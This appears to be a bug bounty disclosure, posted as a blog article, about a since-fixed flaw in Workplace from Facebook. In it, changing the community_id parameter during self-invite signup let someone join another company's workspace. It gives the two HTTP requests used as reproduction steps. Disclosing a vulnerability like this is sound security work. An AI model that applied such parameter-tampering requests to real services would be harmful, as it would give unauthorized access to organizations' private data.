Workplace from Facebook | Unauthorized access to companies environment

Hello Everyone,

In this article, I will be describing a serious vulnerability I found in Workplace, an enterprise social network from Facebook.

Description:

In Workplace, the administrators can choose to activate an option called “self-invite”, which allows anyone to enter without having a verified email address by the admin.

Info: https://www.workplace.com/help/work/336227380906523

Although, the server wasn’t correctly verifying the email used on registration, allowing the creation of accounts through an email that wasn’t verified by the administrator.

This could have allowed a malicious user to access a company’s Workplace environment. But, this was only possible if the company enabled the self-invite feature.

Details:

I was able to find this issue by analyzing network traffic on the “Workplace from Facebook” Android application.

==

  • After registering a new account in my Workplace and revising Burp Suite history tab, I came across the following request:

After some tests with this endpoint, I concluded that was possible to create accounts in other Workplaces just by modifying “community_id”

Using a personal email account (@gmail.com), it was already possible to execute the vulnerability.

Reproduction Steps:

  1. Requesting Activation Code:
POST /at_work/accounts_send_notification HTTP/1.1
Host: graph.workplace.com
identifier=test@gmail.com
pre_login_flow_type=SIGNUP
access_token=*****

Activation code successfully received.

2. Create a Facebook Workplace account:

POST /at_work/accounts_self_invite HTTP/1.1
Host: graph.workplace.com
identifier=test@gmail.com
nonce=998236
community_id=86381-----------
form_data={"name":"Test","password":"Test1234@"}
access_token=*****
  • nonce : activation code from first step.
  • community_id : Target company’s community ID.

==

Boom! The account has been successfully created, and now the attacker has free access to the files, photos, groups, emails and other data from the target company.

Without counting employees exposure…

==

However…

  • The attacker had to have the ID from the target company’s community. This was possible to get through brute force, or with some ex-employee from the company.
  • Some days after I received the bounty, I was able to find an endpoint which gives the community_id from any company in Workplace.

Timeline:

January 11, 2021 — Initial Report
January 25, 2021 — Triaged
February 9, 2021 — Bug Fixed
February 23, 2021 — Bounty awarded (27,5k)

Thank you for taking the time to read my article

My Twitter profile: https://twitter.com/mvinni_

Brazilian 19 years old

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store